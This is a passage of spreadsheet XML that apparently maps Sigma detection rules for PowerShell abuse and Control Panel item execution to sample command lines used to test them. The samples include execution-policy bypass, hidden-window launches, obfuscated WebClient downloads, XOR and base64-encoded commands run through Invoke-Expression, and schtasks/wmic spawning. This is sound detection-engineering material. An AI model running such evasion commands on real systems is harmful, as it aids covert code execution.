      <c r="B3814" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3814" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3814" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3814" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -Scope CurrentUser -File script.ps1</t>
        </is>
      </c>
      <c r="F3814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3814" s="43" t="n"/>
      <c r="J3814" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3814" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3815" ht="15.75" customHeight="1" s="42">
      <c r="A3815" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3815" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3815" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3815" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3815" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Bypass -Scope CurrentUser"</t>
        </is>
      </c>
      <c r="F3815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3815" s="43" t="n"/>
      <c r="J3815" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3815" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3816" ht="15.75" customHeight="1" s="42">
      <c r="A3816" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3816" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3816" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3816" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3816" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn"</t>
        </is>
      </c>
      <c r="F3816" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3816" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3816" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3816" s="43" t="n"/>
      <c r="J3816" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3816" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3817" ht="15.75" customHeight="1" s="42">
      <c r="A3817" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3817" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3817" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3817" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3817" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn</t>
        </is>
      </c>
      <c r="F3817" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3817" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3817" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3817" s="43" t="n"/>
      <c r="J3817" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3817" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3818" ht="15.75" customHeight="1" s="42">
      <c r="A3818" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3818" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C3818" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D3818" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E3818" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn</t>
        </is>
      </c>
      <c r="F3818" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3818" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3818" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3818" s="43" t="n"/>
      <c r="J3818" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3818" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3819" ht="15.75" customHeight="1" s="42">
      <c r="A3819" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3819" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C3819" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D3819" s="43" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E3819" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F3819" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3819" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3819" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3819" s="43" t="n"/>
      <c r="J3819" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3819" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3820" ht="15.75" customHeight="1" s="42">
      <c r="A3820" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3820" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C3820" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D3820" s="43" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E3820" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -win h -exec bypass -c "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F3820" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3820" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3820" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3820" s="43" t="n"/>
      <c r="J3820" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3820" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3821" ht="15.75" customHeight="1" s="42">
      <c r="A3821" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3821" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C3821" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D3821" s="43" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E3821" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -win h -exec bypass -Command "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F3821" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3821" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3821" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3821" s="43" t="n"/>
      <c r="J3821" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3821" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3822" ht="15.75" customHeight="1" s="42">
      <c r="A3822" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3822" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C3822" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D3822" s="43" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E3822" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -win h -exec bypass -Command "Write-Host 'Testing Rule Scope'" -noprofile</t>
        </is>
      </c>
      <c r="F3822" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3822" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3822" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3822" s="43" t="n"/>
      <c r="J3822" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3822" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3823" ht="15.75" customHeight="1" s="42">
      <c r="A3823" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3823" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C3823" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D3823" s="43" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E3823" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle h -ExecutionPolicy bypass -Command "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F3823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3823" s="43" t="n"/>
      <c r="J3823" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3823" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3824" ht="15.75" customHeight="1" s="42">
      <c r="A3824" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3824" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C3824" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D3824" s="43" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E3824" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt</t>
        </is>
      </c>
      <c r="F3824" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3824" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3824" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3824" s="43" t="n"/>
      <c r="J3824" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3824" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3825" ht="15.75" customHeight="1" s="42">
      <c r="A3825" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3825" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C3825" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D3825" s="43" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E3825" s="43" t="inlineStr">
        <is>
          <t>schtasks /create /tn "TaskBypass" /tr "powershell.exe -ExecutionPolicy Bypass -Command Write-Host 'Bypassed'" /sc once /st 00:00 /f &amp;&amp; schtasks /run /tn "TaskBypass"</t>
        </is>
      </c>
      <c r="F3825" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3825" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3825" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3825" s="43" t="n"/>
      <c r="J3825" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3825" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3826" ht="15.75" customHeight="1" s="42">
      <c r="A3826" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3826" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C3826" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D3826" s="43" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E3826" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ping 127.0.0.1"</t>
        </is>
      </c>
      <c r="F3826" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3826" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3826" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3826" s="43" t="n"/>
      <c r="J3826" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3826" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3827" ht="15.75" customHeight="1" s="42">
      <c r="A3827" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3827" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C3827" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D3827" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E3827" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Invoke-Expression (Get-Content $env:LOCALAPPDATA\payload.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F3827" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3827" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3827" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3827" s="43" t="n"/>
      <c r="J3827" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3827" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3828" ht="15.75" customHeight="1" s="42">
      <c r="A3828" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3828" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C3828" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D3828" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E3828" s="43" t="inlineStr">
        <is>
          <t>pwsh -c "&amp; $env:APPDATA\script.ps1"</t>
        </is>
      </c>
      <c r="F3828" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3828" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3828" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3828" s="43" t="n"/>
      <c r="J3828" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3828" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3829" ht="15.75" customHeight="1" s="42">
      <c r="A3829" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3829" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C3829" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D3829" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E3829" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {iex (gc $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F3829" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3829" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3829" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3829" s="43" t="n"/>
      <c r="J3829" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3829" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3830" ht="15.75" customHeight="1" s="42">
      <c r="A3830" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3830" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3830" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3830" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3830" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3830" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3830" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3830" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3830" s="43" t="n"/>
      <c r="J3830" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3830" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3831" ht="15.75" customHeight="1" s="42">
      <c r="A3831" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3831" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3831" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3831" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3831" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.Web`Client).DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3831" s="43" t="n"/>
      <c r="J3831" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3831" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3832" ht="15.75" customHeight="1" s="42">
      <c r="A3832" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3832" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3832" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3832" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3832" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.N'et.WebClient').DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3832" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3832" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3832" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3832" s="43" t="n"/>
      <c r="J3832" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3832" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3833" ht="15.75" customHeight="1" s="42">
      <c r="A3833" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3833" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3833" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3833" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3833" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.txt', '$env:TEMP\test.txt')"</t>
        </is>
      </c>
      <c r="F3833" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3833" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3833" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3833" s="43" t="n"/>
      <c r="J3833" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3833" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3834" ht="15.75" customHeight="1" s="42">
      <c r="A3834" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3834" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3834" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3834" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3834" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.txt', 'C:\t'+'est.txt')"</t>
        </is>
      </c>
      <c r="F3834" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3834" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3834" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3834" s="43" t="n"/>
      <c r="J3834" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3834" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3835" ht="15.75" customHeight="1" s="42">
      <c r="A3835" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3835" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3835" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3835" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3835" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3835" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3835" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3835" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3835" s="43" t="n"/>
      <c r="J3835" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3835" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3836" ht="15.75" customHeight="1" s="42">
      <c r="A3836" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3836" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C3836" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D3836" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E3836" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "`$bytes = 105,102; `$res = ''; `$bytes | % { `$res += [Convert]::ToChar(`$_ -bxor 5) }; Invoke-Expression `$res"</t>
        </is>
      </c>
      <c r="F3836" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3836" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3836" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3836" s="43" t="n"/>
      <c r="J3836" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3836" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3837" ht="15.75" customHeight="1" s="42">
      <c r="A3837" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3837" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C3837" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D3837" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E3837" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "`$k=42; `$arr=100,101; `$res=''; `$arr | % { `$res += [string](`$_ -bxor `$k) }; Write-Host `$res"</t>
        </is>
      </c>
      <c r="F3837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3837" s="43" t="n"/>
      <c r="J3837" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3837" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3838" ht="15.75" customHeight="1" s="42">
      <c r="A3838" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3838" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C3838" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D3838" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E3838" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzAGMAcgBpAHAAdAAgAD0AIAAiAC4ALgAuACIAOwAgACQAZABlAGMAbwBkAGUAZAAgAD0AIAAkAHMAYwByAGkAcAB0ACAAfAAgICUAIAB7ACAAWwBjAGgAYQByAF0AKAAkAF8AIAAtAGIAeABvAHIAIAAyADUANQApACAAfQA7ACAASQBFAFgAIAAtAGoAbwBpAG4AIAAkAGQAZQBjAG8AZABlAGQA</t>
        </is>
      </c>
      <c r="F3838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3838" s="43" t="n"/>
      <c r="J3838" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3838" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3839" ht="15.75" customHeight="1" s="42">
      <c r="A3839" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B3839" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3839" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3839" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3839" s="43" t="inlineStr">
        <is>
          <t>control.exe malicious.cpl</t>
        </is>
      </c>
      <c r="F3839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3839" s="43" t="n"/>
      <c r="J3839" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3839" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3840" ht="15.75" customHeight="1" s="42">
      <c r="A3840" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B3840" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3840" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3840" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3840" s="43" t="inlineStr">
        <is>
          <t>control.exe payload.dll</t>
        </is>
      </c>
      <c r="F3840" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3840" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3840" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3840" s="43" t="n"/>
      <c r="J3840" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3840" s="43" t="b">
        <v>0</v>
      </c>
    </row>
